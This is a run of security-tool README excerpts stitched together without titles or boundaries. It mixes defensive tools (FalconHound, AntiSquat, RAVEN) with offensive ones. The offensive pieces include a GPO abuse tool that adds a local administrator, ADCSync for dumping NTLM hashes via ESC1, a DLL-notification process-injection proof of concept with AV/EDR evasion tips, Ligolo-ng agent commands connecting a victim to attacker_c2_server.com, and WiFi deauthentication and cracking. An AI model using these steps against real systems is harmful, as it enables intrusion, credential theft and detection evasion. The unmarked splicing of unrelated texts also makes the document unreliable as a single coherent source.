  -all         Return all the rows in the DB
  -cn string   String to search for in common name column, returns like-results (default "NONE")
  -db string   String of the DB you want to connect to and save certs! (default "certificates.db")
  -h           print usage!
  -ip string   String to search for in IP column, returns like-results (default "NONE")
  -num         Return the number of rows (results) in the DB (by IP)
  -org string  String to search for in Organization column, returns like-results (default "NONE")
  -san string  String to search for in SAN column, returns like-results (default "NONE")
This tool can be used when a controlled account can modify an existing GPO that applies to one or more users & computers. It will create an immediate scheduled task as SYSTEM on the remote computer for computer GPO, or as logged in user for user GPO.
Default behavior adds a local administrator.
How to use
Basic usage
Add john user to local administrators group (Password: H4x00r123..)
FalconHound is a blue team multi-tool. It allows you to utilize and enhance the power of BloodHound in a more automated fashion. It is designed to be used in conjunction with a SIEM or other log aggregation tool.
One of the challenging aspects of BloodHound is that it is a snapshot in time. FalconHound includes functionality that can be used to keep a graph of your environment up-to-date. This allows you to see your environment as it is NOW. This is especially useful for environments that are constantly changing.
One of the hardest relationships to gather for BloodHound is local group memberships and session information. As blue teamers, we have this information readily available in our logs. FalconHound can be used to gather this information and add it to the graph, allowing it to be used by BloodHound.
This is just an example of how FalconHound can be used. It can be used to gather any information that you have in your logs or security tools and add it to the BloodHound graph.
Additionally, the graph can be used to trigger alerts or generate enrichment lists. For example, if a user is added to a certain group, FalconHound can be used to query the graph database for the shortest path to a sensitive or high-privilege group. If there is a path, this can be logged to the SIEM or used to trigger an alert.
Other examples where FalconHound can be used:
Adding, removing or timing out sessions in the graph, based on logon and logoff events.
Marking users and computers as compromised in the graph when they have an incident in Sentinel or MDE.
Adding CVE information and whether there is a public exploit available to the graph.
All kinds of Azure activities.
Recalculating the shortest path to sensitive groups when a user is added to a group or has a new role.
Adding new users, groups and computers to the graph.
Generating enrichment lists for Sentinel and Splunk of, for example, Kerberoastable users or users with ownerships of certain entities.
The possibilities are endless here. Please add more ideas to the issue tracker or submit a PR.
A blog detailing more on why we developed it and some use case examples can be found here
FalconHound is designed to be used with BloodHound. It is not a replacement for BloodHound. It is designed to leverage the power of BloodHound and all other data platforms it supports in an automated fashion.
Currently, FalconHound supports the following data sources and or targets:
Azure Sentinel
Azure Sentinel Watchlists
Splunk
Microsoft Defender for Endpoint
Neo4j
MS Graph API (early stage)
CSV files
Additional data sources and targets are planned for the future.
At this moment, FalconHound only supports the Neo4j database for BloodHound. Support for the API of BH CE and BHE is under active development.
Installation
Since FalconHound is written in Go, there is no installation required. Just download the binary from the releases section and run it. Compiled binaries are available for Windows, Linux and macOS.
Before you can run it, you need to create a config file. You can find an example config file in the root folder. Instructions on how to create all credentials can be found here.
The recommended way to run FalconHound is as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date.
Requirements
BloodHound, or at least the Neo4j database for now.
A SIEM or other log aggregation tool. Currently, Azure Sentinel and Splunk are supported.
Credentials for each endpoint you want to talk to, with the required permissions.
Configuration
FalconHound is configured using a YAML file. You can find an example config file in the root folder. Each section of the config file is explained below.
Usage
Default run
To run FalconHound, just run the binary and add the -go parameter to have it run all queries in the actions folder.
./falconhound -go
List all enabled actions
To list all enabled actions, use the -actionlist parameter. This will list all actions that are enabled in the config files in the actions folder. This should be used in combination with the -go parameter.
./falconhound -actionlist -go
Run with a select set of actions
To run a select set of actions, use the -ids parameter, followed by one or a list of comma-separated action IDs. This will run the actions that are specified in the parameter, which can be very handy when testing, troubleshooting or when you require specific, more frequent updates. This should be used in combination with the -go parameter.
./falconhound -ids action1,action2,action3 -go
Run with a different config file
By default, FalconHound will look for a config file in the current directory. You can also specify a config file using the -config flag. This can allow you to run multiple instances of FalconHound with different configurations, against different environments.
./falconhound -go -config /path/to/config.yml
Run with a different actions folder
By default, FalconHound will look for the actions folder in the current directory. You can also specify a different folder using the -actions-dir flag. This makes testing and troubleshooting easier, but also allows you to run multiple instances of FalconHound with different configurations, against different environments, or at different time intervals.
By default, FalconHound will use the credentials in the config.yml (or a custom loaded one). By setting the -keyvault flag FalconHound will get the keyvault from the config and retrieve all secrets from there. Should there be items missing in the keyvault it will fall back to the config file.
./falconhound -go -keyvault
Actions
Actions are the core of FalconHound. They are the queries that FalconHound will run. They are written in the native language of the source and target and are stored in the actions folder. Each action is a separate file and is stored in the directory of the source of the information, the query target. The filename is used as the name of the action.
Action folder structure
The action folder is divided into sub-directories per query source. All folders will be processed recursively and all YAML files will be executed in alphabetical order.
The Neo4j actions should be processed last, since their output relies on other data sources to have updated the graph database first, to get the most up-to-date results.
Action files
All files are YAML files. The YAML file contains the query, some metadata and the target(s) of the queried information.
There is a template file available in the root folder. You can use this to create your own actions. Have a look at the actions in the actions folder for more examples.
While most items are fairly self-explanatory, there are some important things to note about actions:
Enabled
As the name implies, this is used to enable or disable an action. If this is set to false, the action will not be run.
Enabled: true
Debug
This is used to enable or disable debug mode for an action. If this is set to true, the action will be run in debug mode. This will output the results of the query to the console. This is useful for testing and troubleshooting, but is not recommended to be used in production. It will slow down the processing of the action depending on the number of results.
Debug: false
Query
The Query field is the query that will be run against the source. This can be a KQL query, a SPL query or a Cypher query depending on your SourcePlatform. IMPORTANT: Try to keep the query as exact as possible and only return the fields that you need. This will make the processing of the results faster and more efficient.
Additionally, when running Cypher queries, make sure to RETURN a JSON object as the result, otherwise processing will fail. For example, this will return the Name, Count, Role and Owners of the Azure Subscriptions:
MATCH p = (n)-[r:AZOwns|AZUserAccessAdministrator]->(g:AZSubscription) RETURN {Name:g.name , Count:COUNT(g.name), Role:type(r), Owners:COLLECT(n.name)}
Targets
Each target has several options that can be configured. Depending on the target, some might require more configuration than others. All targets have the Name and Enabled fields. The Name field is used to identify the target. The Enabled field is used to enable or disable the target. If this is set to false, the target will be ignored.
The Neo4j target will write the results of the query to a Neo4j database. This output is per line and therefore it requires some additional configuration. Since we can transfer all sorts of data in all directions, FalconHound needs to understand what to do with the data. This is done by using replacement variables in the first line of your Cypher queries. These are passed to Neo4j as parameters and can be used in the query. The ReplacementFields fields are configured below.
- Name: Neo4j
  Enabled: true
  Query: |
    MATCH (x:Computer {name:$Computer})
    MATCH (y:User {objectid:$TargetUserSid})
    MERGE (x)-[r:HasSession]->(y)
    SET r.since=$Timestamp
    SET r.source='falconhound'
  Parameters:
    Computer: Computer
    TargetUserSid: TargetUserSid
    Timestamp: Timestamp
The Parameters section defines a set of parameters that will be replaced by the values from the query results. These can be referenced as Neo4j parameters using the $parameter_name syntax.
Sentinel
The Sentinel target will write the results of the query to a Sentinel table. The table will be created if it does not exist. The table will be created in the workspace that is specified in the config file. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
This is also why query output needs to be controlled; you might otherwise flood your target.
- Name: Sentinel
  Enabled: true
Sentinel Watchlists
The Sentinel Watchlists target will write the results of the query to a Sentinel watchlist. The watchlist will be created if it does not exist. The watchlist will be created in the workspace that is specified in the config file. All columns returned by the query will be added to the watchlist.
The WatchlistName field is the name of the watchlist. The DisplayName field is the display name of the watchlist.
The SearchKey field is the column that will be used as the search key.
The Overwrite field is used to determine if the watchlist should be overwritten or appended to. If this is set to false, the results of the query will be appended to the watchlist. If this is set to true, the watchlist will be deleted and recreated with the results of the query.
Splunk
Like Sentinel, Splunk will write the results of the query to a Splunk index. The index will need to be created and tied to a HEC endpoint. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
- Name: Splunk
  Enabled: true
Azure Data Explorer
Like Sentinel and Splunk, the ADX target will write the results of the query to an ADX table. The data from the query will be added to the EventData field. The EventID will be the action ID and the Description will be the action name.
- Name: ADX
  Enabled: true
  Table: "name"
Extensions to the graph
Relationship: HadSession
Once a session has ended, it would have to be removed from the graph, but this felt like a waste of information. So instead of removing the session, it is converted into a relationship between the computer and the user, called HadSession. The relationship has the following properties:
This allows for additional path discoveries where we can investigate whether the user ever logged on to a certain system, even if the session has ended.
Properties
FalconHound will add the following properties to nodes in the graph:
Computer:
- 'exploitable': true/false
- 'exploits': list of CVEs
- 'exposed': true/false
- 'ports': list of ports accessible from the internet
- 'alertids': list of alert ids
Credential management
The currently supported ways of providing FalconHound with credentials are:
Via the config.yml file on disk.
Keyvault secrets. This still requires a ServicePrincipal with secrets in the yaml.
Mixed mode.
Config.yml
The config file holds all details required by each platform. All items in the config file are case-sensitive. Best practice is to separate the apps on a per-service level, but you can use one AppID/AppSecret for all Azure-based actions.
The required permissions for your AppID/AppSecret are listed here.
Keyvault
A more secure way of storing the credentials is to use an Azure Key Vault. Be aware that there is a small cost to using Key Vaults. Access to Key Vaults currently only supports authentication based on an AppID/AppSecret, which needs to be configured in the config.yml file.
The recommended way to set this up is to use a ServicePrincipal that only has the Key Vault Secrets User role on this Key Vault. This role only allows reading secrets, not even listing them. Do NOT reuse the ServicePrincipal which has access to Sentinel and/or MDE, since this almost completely negates the benefit of a Key Vault.
The items to configure in the Keyvault are listed below. Please note Keyvault secrets are not case-sensitive.
Once configured you can add the -keyvault parameter while starting FalconHound.
Mixed mode / fallback
When the -keyvault parameter is set on the command-line, this will be the primary source for all required secrets. Should FalconHound fail to retrieve items, it will fall back to the equivalent item in the config.yml. If both fail and there are actions enabled for that source or target, it will throw errors on attempts to authenticate.
Deployment
FalconHound is designed to be run as a scheduled task or cron job. This will allow you to run it on a regular basis and keep your graph, alerts and enrichments up-to-date. Depending on the amount of actions you have enabled, the amount of data you are processing and the amount of data you are writing to the graph, this can take a while.
All log based queries are built to run every 15 minutes. Should processing take too long you might need to tweak this a little. If this is the case it might be recommended to disable certain actions.
Also, there might be some overlap with, for instance, the session actions. If you have a lot of sessions, you might want to disable the session actions for Sentinel and rely on the ones from MDE. This assumes you have MDE and Sentinel connected and most machines are onboarded into MDE.
Sharphound / Azurehound
While FalconHound is designed to be used with BloodHound, it is not a replacement for Sharphound and Azurehound. It is designed to complement collection and remove the moment-in-time problem of periodic collection. Both Sharphound and Azurehound are still required to collect the data, since not all similar data is available in logs.
It is recommended to run Sharphound and Azurehound on a regular basis, for example once a day/week or month, and FalconHound every 15 minutes.
License
This project is licensed under the BSD3 License - see the LICENSE file for details.
This means you can use this software for free, even in commercial products, as long as you credit us for it. You cannot hold us liable for any damages caused by this software.
This is a tool I whipped up quickly to DCSync utilizing ESC1. It is quite slow, but otherwise an effective means of performing a makeshift DCSync attack without utilizing DRSUAPI or Volume Shadow Copy.
This is the first version of the tool and essentially just automates the process of running Certipy against every user in a domain. It still needs a lot of work and I plan on adding more features in the future for authentication methods and automating the process of finding a vulnerable template.
ADCSync uses the ESC1 exploit to dump NTLM hashes from user accounts in an Active Directory environment. The tool will first grab every user and domain in the Bloodhound dump file passed in. Then it will use Certipy to make a request for each user and store their PFX file in the certificate directory. Finally, it will use Certipy to authenticate with the certificate and retrieve the NT hash for each user. This process is quite slow and can take a while to complete but offers an alternative way to dump NTLM hashes.
Installation
git clone https://github.com/JPG0mez/adcsync.git
cd adcsync
pip3 install -r requirements.txt
Usage
To use this tool we need the following things:
Valid Domain Credentials
A user list from a bloodhound dump that will be passed in.
A template vulnerable to ESC1 (Found with Certipy find)
Options:
  -f, --file TEXT      Input User List JSON file from Bloodhound [required]
  -o, --output TEXT    NTLM Hash Output file [required]
  -ca TEXT             Certificate Authority [required]
  -dc-ip TEXT          IP Address of Domain Controller [required]
  -u, --user TEXT      Username [required]
  -p, --password TEXT  Password [required]
  -template TEXT       Template Name vulnerable to ESC1 [required]
  -target-ip TEXT      IP Address of the target machine [required]
  --help               Show this message and exit.
TODO
Support alternative authentication methods such as NTLM hashes and ccache files
Automatically run "certipy find" to find and grab templates vulnerable to ESC1
Add jitter and sleep options to avoid detection
Add type validation for all variables
Acknowledgements
puzzlepeaches: Telling me to hurry up and write this
The tool has two features. The first is the ability to enumerate non-Windows hosts that are joined to Active Directory and offer GSSAPI authentication over SSH.
The second feature is the ability to perform dynamic DNS updates for GSSAPI abusable hosts that do not have the correct forward and/or reverse lookup DNS entries. GSSAPI based authentication is strict when it comes to matching service principals, therefore DNS entries should match the service principal name both by hostname and IP address.
Prerequisites
gssapi-abuse requires a working krb5 stack along with a correctly configured krb5.conf.
Windows
On Windows hosts, the MIT Kerberos software should be installed in addition to the Python modules listed in requirements.txt; it can be obtained from the MIT Kerberos Distribution Page. On Windows, krb5.conf can be found at C:\ProgramData\MIT\Kerberos5\krb5.conf
Linux
The libkrb5-dev package needs to be installed prior to installing python requirements
All
Once the requirements are satisfied, you can install the python dependencies via pip/pip3 tool
pip install -r requirements.txt
Enumeration Mode
The enumeration mode will connect to Active Directory and perform an LDAP search for all computers that do not have the word Windows within the Operating System attribute.
Once the list of non-Windows machines has been obtained, gssapi-abuse will attempt to connect to each host over SSH and determine whether GSSAPI-based authentication is permitted.
Example
python .\gssapi-abuse.py -d ad.ginge.com enum -u john.doe -p SuperSecret!
[=] Found 2 non Windows machines registered within AD
[!] Host ubuntu.ad.ginge.com does not have GSSAPI enabled over SSH, ignoring
[+] Host centos.ad.ginge.com has GSSAPI enabled over SSH
DNS Mode
DNS mode utilises Kerberos and dnspython to perform an authenticated DNS update over port 53 using the DNS-TSIG protocol. Currently, dns mode relies on a working krb5 configuration with a valid TGT or a DNS service ticket targeting a specific domain controller, e.g. DNS/dc1.victim.local.
Examples
Adding a DNS A record for host ahost.ad.ginge.com
python .\gssapi-abuse.py -d ad.ginge.com dns -t ahost -a add --type A --data 192.168.128.50
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding A record for target ahost using data 192.168.128.50
[+] Applied 1 updates successfully
Adding a reverse PTR record for host ahost.ad.ginge.com. Notice that the data argument is terminated with a "."; this is important, otherwise the record becomes relative to the zone, which we do not want. We also need to specify the target zone to update, since PTR records are stored in different zones than A records.
python .\gssapi-abuse.py -d ad.ginge.com dns --zone 128.168.192.in-addr.arpa -t 50 -a add --type PTR --data ahost.ad.ginge.com.
[+] Successfully authenticated to DNS server win-af8ki8e5414.ad.ginge.com
[=] Adding PTR record for target 50 using data ahost.ad.ginge.com.
[+] Applied 1 updates successfully
Forward and reverse DNS lookup results after execution
DllNotificationInjection is a PoC of a new "threadless" process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.
An accompanying blog post with more details is available here:
DllNotificationInjection works by creating a new LDR_DLL_NOTIFICATION_ENTRY in the remote process. It inserts it manually into the remote LdrpDllNotificationList by patching the List.Flink of the list head and the List.Blink of the first (now second) entry of the list.
Our new LDR_DLL_NOTIFICATION_ENTRY will point to a custom trampoline shellcode (built with @C5pider's ShellcodeTemplate project) that will restore our changes and execute a malicious shellcode in a new thread using TpWorkCallback.
After manually registering our new entry in the remote process we just need to wait for the remote process to trigger our DLL Notification Callback by loading or unloading some DLL. This obviously doesn't happen in every process regularly so prior work finding suitable candidates for this injection technique is needed. From my brief searching, it seems that RuntimeBroker.exe and explorer.exe are suitable candidates for this, although I encourage you to find others as well.
OPSEC Notes
This is a POC. In order for this to be OPSEC safe and evade AV/EDR products, some modifications are needed. For example, I used RWX when allocating memory for the shellcodes - don't be lazy (like me) and change those. One might also want to replace OpenProcess, ReadProcessMemory and WriteProcessMemory with some lower-level APIs and use Indirect Syscalls or (shameless plug) HWSyscalls. Maybe encrypt the shellcodes, or even go the extra mile and modify the trampoline shellcode to suit your needs - or at least change the default hash values in @C5pider's ShellcodeTemplate project, which was utilized to create the trampoline shellcode.
Acknowledgments
@C5pider for his ShellcodeTemplate project, which was used to create the trampoline shellcode. Also, for Havoc C2, which was used in the POC Demo Video.
Introducing Uscrapper 2.0, a powerful OSINT web scraper that allows users to extract various personal information from a website. It leverages web scraping techniques and regular expressions to extract email addresses, social media links, author names, geolocations, phone numbers, and usernames from both hyperlinked and non-hyperlinked sources on the webpage, and it supports multithreading to make this process faster. Uscrapper 2.0 is equipped with advanced anti-web-scraping bypass modules and supports web crawling to scrape from various sublinks within the same domain. The tool also provides an option to generate a report containing the extracted details.
Extracted Details:
Uscrapper extracts the following details from the provided website:
Email Addresses: Displays email addresses found on the website.
Social Media Links: Displays links to various social media platforms found on the website.
Author Names: Displays the names of authors associated with the website.
Geolocations: Displays geolocation information associated with the website.
Non-Hyperlinked Details: Displays non-hyperlinked details found on the website, including email addresses, phone numbers, and usernames.
What's New?
Uscrapper 2.0:
Introduced multiple modules to bypass anti-web-scraping techniques.
Introducing Crawl and Scrape: an advanced crawl-and-scrape module to scrape websites from within.
Implemented Multithreading to make these processes faster.
-u URL, --url URL: Specify the URL of the website to extract details from.
-c INT, --crawl INT: Specify the number of links to crawl.
-t INT, --threads INT: Specify the number of threads to use while crawling and scraping.
-O, --generate-report: Generate a report file containing the extracted details.
-ns, --nonstrict: Display non-strict usernames during extraction.
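For example, a typical invocation combining these options (the entry-point script name here is an assumption; check the repository for the exact filename):

python uscrapper.py -u https://example.com -c 10 -t 4 -O -ns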
Note:
Uscrapper relies on web scraping techniques to extract information from websites. Make sure to use it responsibly and in compliance with the website's terms of service and applicable laws.
The accuracy and completeness of the extracted details depend on the structure and content of the website being analyzed.
To bypass some anti-web-scraping methods we have used Selenium, which can make the overall process slower.
Contribution:
Want a new feature to be added?
Make a pull request with all the necessary details and it will be merged after a review.
You can contribute by making the regular expressions more efficient and accurate, or by suggesting some more features that can be added.
Rayder is a command-line tool designed to simplify the orchestration and execution of workflows. It allows you to define a series of modules in a YAML file, each consisting of commands to be executed. Rayder helps you automate complex processes, making it easy to streamline repetitive tasks and execute modules in parallel when the commands do not depend on each other.
Installation
To install Rayder, ensure you have Go (1.16 or higher) installed on your system. Then, run the following command:
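A typical installation would look like this (module path assumed; check the repository for the exact one):

go install github.com/devanshbatham/rayder@latest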
Rayder allows you to use variables in your workflow configuration, making it easy to parameterize your commands and achieve more flexibility. You can define variables in the vars section of your workflow YAML file. These variables can then be referenced within your command strings using double curly braces ({{}}).
Defining Variables
To define variables, add them to the vars section of your workflow YAML file:
vars:
  VAR_NAME: value
  ANOTHER_VAR: another_value
  # Add more variables...
Referencing Variables in Commands
You can reference variables within your command strings using double curly braces ({{}}). For example, if you defined a variable OUTPUT_DIR, you can use it like this:
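For instance, a minimal sketch (the module schema is simplified and the command contents are hypothetical):

modules:
  - name: prepare-output
    cmds:
      - mkdir -p {{OUTPUT_DIR}}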
You can also supply values for variables via the command line when executing your workflow. Use the format VARIABLE_NAME=value to provide values for specific variables. For example:
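A sketch of such an invocation (the -w flag for selecting the workflow file is an assumption; consult rayder --help):

rayder -w workflow.yaml OUTPUT_DIR=custom_output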
If you don't provide values for variables via the command line, Rayder will automatically apply default values defined in the vars section of your workflow YAML file.
Remember that variables supplied via the command line will override the default values defined in the YAML configuration.
Example
Example 1:
Here's an example of how you can define, reference, and supply variables in your workflow configuration:
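A minimal sketch under the same assumed schema, with a default defined in vars and then overridden at invocation time:

vars:
  OUTPUT_DIR: results
modules:
  - name: make-dir
    cmds:
      - mkdir -p {{OUTPUT_DIR}}

rayder -w workflow.yaml OUTPUT_DIR=custom_output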
This will override the default values and use the provided values for these variables.
Example 2:
Here's an example workflow configuration tailored for reverse whois recon and processing the root domains into subdomains, resolving them and checking which ones are alive:
The parallel field in the workflow configuration determines whether modules should be executed in parallel or sequentially. Setting parallel to true allows modules to run concurrently, making it suitable for modules with no dependencies. When set to false, modules will execute one after another.
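A minimal illustration of the two modes (module contents hypothetical):

parallel: false   # set to true to run modules concurrently
modules:
  - name: first
    cmds:
      - echo "runs first"
  - name: second
    cmds:
      - echo "runs after first, because parallel is false"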
Workflows
Explore a collection of sample workflows and examples in the Rayder workflows repository. Stay tuned for more additions!
Inspiration
The inspiration for this project comes from the awesome Taskfile project.
Airgorah is a WiFi auditing software that can discover the clients connected to an access point, perform deauthentication attacks against specific clients or all the clients connected to it, capture WPA handshakes, and crack the password of the access point.
It is written in Rust and uses GTK4 for the graphical part. The software is mainly based on aircrack-ng tools suite.
⭐ Don't forget to put a star if you like the project!
Legal
Airgorah is designed to be used for testing and discovering flaws in networks you own. Performing attacks on WiFi networks you do not own is illegal in almost all countries. I am not responsible for any damage you may cause by using this software.
Requirements
This software only works on Linux and requires root privileges to run.
You will also need a wireless network card that supports monitor mode and packet injection.
AntiSquat leverages AI techniques such as natural language processing (NLP), large language models (ChatGPT) and more to empower detection of typosquatting and phishing domains.
How to use
Clone the project via git clone https://github.com/redhuntlabs/antisquat.
Install all dependencies by typing pip install -r requirements.txt.
Create a file named .openai-key and paste your ChatGPT API key in there.
(Optional) Visit https://developer.godaddy.com/keys and grab a GoDaddy API key. Create a file named .godaddy-key and paste your GoDaddy API key in there.
Create a file named domains.txt. Type in a line-separated list of domains you'd like to scan.
(Optional) Create a file named blacklist.txt. Type in a line-separated list of domains you’d like to ignore. Regular expressions are supported.
Run antisquat using python3.8 antisquat.py domains.txt
Examples:
Let’s say you’d like to run antisquat on "flipkart.com".
Create a file named "domains.txt", then type in flipkart.com. Then run python3.8 antisquat.py domains.txt.
AntiSquat generates several permutations of the domain, iterates through them one by one, and tries to extract all contact information from the page.
Test case:
A test case for amazon.com is attached. To run it without any api keys, simply run python3.8 test.py
Here, the tool appears to have captured a test phishing site for amazon.com. Similar domains that may be available for sale can be captured in this way and any contact information from the site may be extracted.
If you'd like to know more about the tool, make sure to check out our blog.
Ligolo-ng is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need for SOCKS).
Features
Tun interface (No more SOCKS!)
Simple UI with agent selection and network information
Easy to use and setup
Automatic certificate configuration with Let's Encrypt
Performant (Multiplexing)
Does not require high privileges
Socket listening/binding on the agent
Multiple platforms supported for the agent
How is this different from Ligolo/Chisel/Meterpreter... ?
Instead of using a SOCKS proxy or TCP/UDP forwarders, Ligolo-ng creates a userland network stack using gVisor.
When running the relay/proxy server, a tun interface is used; packets sent to this interface are translated and then transmitted to the agent's remote network.
As an example, for a TCP connection:
SYN packets are translated to a connect() on the remote host
SYN-ACK is sent back if connect() succeeds
RST is sent if connect() returns ECONNRESET, ECONNABORTED or ECONNREFUSED
Nothing is sent on timeout
This allows running tools like nmap without the use of proxychains (simpler and faster).
Building & Usage
Precompiled binaries
Precompiled binaries (Windows/Linux/macOS) are available on the Release page.
Building Ligolo-ng
Building ligolo-ng (Go >= 1.20 is required):
$ go build -o agent cmd/agent/main.go
$ go build -o proxy cmd/proxy/main.go
# Build for Windows
$ GOOS=windows go build -o agent.exe cmd/agent/main.go
$ GOOS=windows go build -o proxy.exe cmd/proxy/main.go
Setup Ligolo-ng
Linux
When using Linux, you need to create a tun interface on the Proxy Server (C2):
$ sudo ip tuntap add user [your_username] mode tun ligolo
$ sudo ip link set ligolo up
Windows
You need to download the Wintun driver (used by WireGuard) and place the wintun.dll in the same folder as Ligolo (make sure you use the right architecture).
Running Ligolo-ng proxy server
Start the proxy server on your Command and Control (C2) server (default port 11601):
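For example, using the certificate automation described below (replace the domain with your own):

$ ./proxy -autocert attacker_c2_server.com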
When using the -autocert option, the proxy will automatically request a certificate (using Let's Encrypt) for attacker_c2_server.com when an agent connects.
Port 80 needs to be accessible for Let's Encrypt certificate validation/retrieval
Using your own TLS certificates
If you want to use your own certificates for the proxy server, you can use the -certfile and -keyfile parameters.
The proxy/relay can automatically generate self-signed TLS certificates using the -selfcert option.
The -ignore-cert option needs to be used with the agent.
Beware of man-in-the-middle attacks! This option should only be used in a test environment or for debugging purposes.
Using Ligolo-ng
Start the agent on your target (victim) computer (no privileges are required!):
$ ./agent -connect attacker_c2_server.com:11601
If you want to tunnel the connection over a SOCKS5 proxy, you can use the --socks ip:port option. You can specify SOCKS credentials using the --socks-user and --socks-pass arguments.
Because the agent is running without privileges, it's not possible to forward raw packets. When you perform an Nmap SYN scan, a TCP connect() is performed on the agent.
When using nmap, you should use --unprivileged or -PE to avoid false positives.
Todo
Implement other ICMP error messages (this will speed up UDP scans);
Do not RST when receiving an ACK from an invalid TCP connection (nmap will report the host as up).
Find authentication (authn) and authorization (authz) security bugs in web application routes:
Web application HTTP route authn and authz bugs are some of the most common security issues found today. These industry-standard resources highlight the severity of the issue:
RAVEN (Risk Analysis and Vulnerability Enumeration for CI/CD) is a powerful security tool designed to perform massive scans for GitHub Actions CI workflows and digest the discovered data into a Neo4j database. Developed and maintained by the Cycode research team.
With Raven, we were able to identify and report security vulnerabilities in some of the most popular repositories hosted on GitHub, including:
We listed all vulnerabilities discovered using Raven in the tool's Hall of Fame.
What is Raven
The tool provides the following capabilities to scan and analyze potential CI/CD vulnerabilities:
Downloader: You can download workflows and actions necessary for analysis. Workflows can be downloaded for a specified organization or for all repositories, sorted by star count. Performing this step is a prerequisite for analyzing the workflows.
Indexer: Digesting the downloaded data into a graph-based Neo4j database. This process involves establishing relationships between workflows, actions, jobs, steps, etc.
Query Library: We created a library of pre-defined queries based on research conducted by the community.
Reporter: Raven has a simple way of reporting suspicious findings. As an example, it can be incorporated into the CI process for pull requests and run there.
Possible usages for Raven:
Scanner for your own organization's security
Scanning specified organizations for bug bounty purposes
Scan everything and report issues found to save the internet
Research and learning purposes
This tool provides a reliable and scalable solution for CI/CD security analysis, enabling users to query bad configurations and gain valuable insights into their codebase's security posture.
Why Raven
In the past year, Cycode Labs conducted extensive research on fundamental security issues of CI/CD systems. We examined the depths of many systems, thousands of projects, and several configurations. The conclusion is clear – the model in which security is delegated to developers has failed. This has been proven several times in our previous content:
A simple injection scenario exposed dozens of public repositories, including popular open-source projects.
We found that one of the most popular frontend frameworks was vulnerable to the innovative method of branch injection attack.
We detailed a completely different attack vector, third-party integration risks, which affected the most popular project on GitHub and thousands more.
Finally, the Microsoft 365 UI framework, with more than 300 million users, is vulnerable to an additional new threat – an artifact poisoning attack.
Additionally, we found, reported, and disclosed hundreds of other vulnerabilities privately.
Each of the vulnerabilities above has unique characteristics, making it nearly impossible for developers to stay up to date with the latest security trends. Unfortunately, each vulnerability shares a commonality – each exploitation can impact millions of victims.
It was for these reasons that Raven was created: a framework for CI/CD security analysis, with GitHub Actions workflows as the first use case. Our focus was on complex scenarios where each issue isn't a threat on its own, but when combined, they pose a severe threat.
Setup && Run
To get started with Raven, follow these installation instructions:
Step 1: Install the Raven package
pip3 install raven-cycode
Step 2: Set up a local Redis server and Neo4j database
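One way to run both locally is with Docker (the container names and the Neo4j password are placeholders, not RAVEN requirements):

docker run -d --name raven-redis -p 6379:6379 redis:7
docker run -d --name raven-neo4j -p 7474:7474 -p 7687:7687 -e NEO4J_AUTH=neo4j/CHANGEME neo4j:5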
options:
  -h, --help            show this help message and exit
  --token TOKEN         GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
  --debug               Whether to print debug statements, default: False
  --redis-host REDIS_HOST
                        Redis host, default: localhost
  --redis-port REDIS_PORT
                        Redis port, default: 6379
  --clean-redis, -cr    Whether to clean cache in the redis, default: False
  --org-name ORG_NAME   Organization name to download the workflows
options:
  -h, --help            show this help message and exit
  --token TOKEN         GITHUB_TOKEN to download data from Github API (Needed for effective rate-limiting)
  --debug               Whether to print debug statements, default: False
  --redis-host REDIS_HOST
                        Redis host, default: localhost
  --redis-port REDIS_PORT
                        Redis port, default: 6379
  --clean-redis, -cr    Whether to clean cache in the redis, default: False
  --max-stars MAX_STARS
                        Maximum number of stars for a repository
  --min-stars MIN_STARS
                        Minimum number of stars for a repository, default: 1000
It is possible to run an external action by referencing a folder with a Dockerfile (without an action.yml). Currently, this behavior isn't supported.
It is possible to run an external action by referencing a Docker container through the docker://... URL. Currently, this behavior isn't supported.
It is possible to run an action by referencing it locally. This creates complex behavior, as it may come from a different repository that was checked out previously. The current behavior is to try to find it in the existing repository.
We aren't modeling the entire workflow structure. If additional fields are needed, please submit a pull request according to the contribution guidelines.
Future Research Work
Implementation of taint analysis. Example use case: a user can pass a pull request title (an attacker-controllable parameter) to an action parameter named data. That action parameter may then be used in a run command: - run: echo ${{ inputs.data }}, which creates a path to code execution. (A sketch of this flow follows after this list.)
Expand the research to find harmful misuse of GITHUB_ENV. This may utilize the previous taint analysis as well.
Research whether actions/github-script has an interesting threat landscape. If it does, it can be modeled in the graph.
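A hypothetical sketch of the taint-analysis use case from the list above (the composite action and its repository name are invented for illustration):

# action.yml of a hypothetical composite action with a 'data' input
inputs:
  data:
    required: true
runs:
  using: composite
  steps:
    - run: echo ${{ inputs.data }}   # attacker-controlled text reaches the shell
      shell: bash

# Workflow feeding the attacker-controllable pull request title into that input
on: pull_request_target
jobs:
  example:
    runs-on: ubuntu-latest
    steps:
      - uses: some-org/some-action@v1
        with:
          data: ${{ github.event.pull_request.title }}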
Want more CI/CD security, AppSec, and ASPM content? Check out Cycode.
If you liked Raven, you would probably love our Cycode platform, which offers even more enhanced capabilities for visibility, prioritization, and remediation of vulnerabilities across the software delivery lifecycle.
If you are interested in a robust, research-driven Pipeline Security, Application Security, or ASPM solution, don't hesitate to get in touch with us or request a demo using the form https://cycode.com/book-a-demo/.
BucketLoot is an automated S3-compatible bucket inspector that can help users extract assets, flag secret exposures, and even search for custom keywords and regular expressions in publicly exposed storage buckets, by scanning files that store data in plain text.
The tool can scan for buckets deployed on Amazon Web Services (AWS), Google Cloud Storage (GCS), DigitalOcean Spaces and even custom domains/URLs which could be connected to these platforms. It returns the output in a JSON format, thus enabling users to parse it according to their liking or forward it to any other tool for further processing.
BucketLoot comes with a guest mode by default, which means a user doesn't need to specify any API tokens or access keys initially in order to run the scan. The tool will scrape a maximum of 1000 files that are returned in the XML response; if the storage bucket contains more than 1000 entries the user would like to scan, they can provide platform credentials to run a complete scan. If you'd like to know more about the tool, make sure to check out our blog.
Features
Secret Scanning
Scans for over 80 unique regex signatures that can help in uncovering secret exposures, tagged with their severity, in the misconfigured storage bucket. Users have the ability to modify or add their own signatures in the regexes.json file. If you believe you have any cool signatures which might be helpful for others too and could be flagged at scale, go ahead and make a PR!
Sensitive File Checks
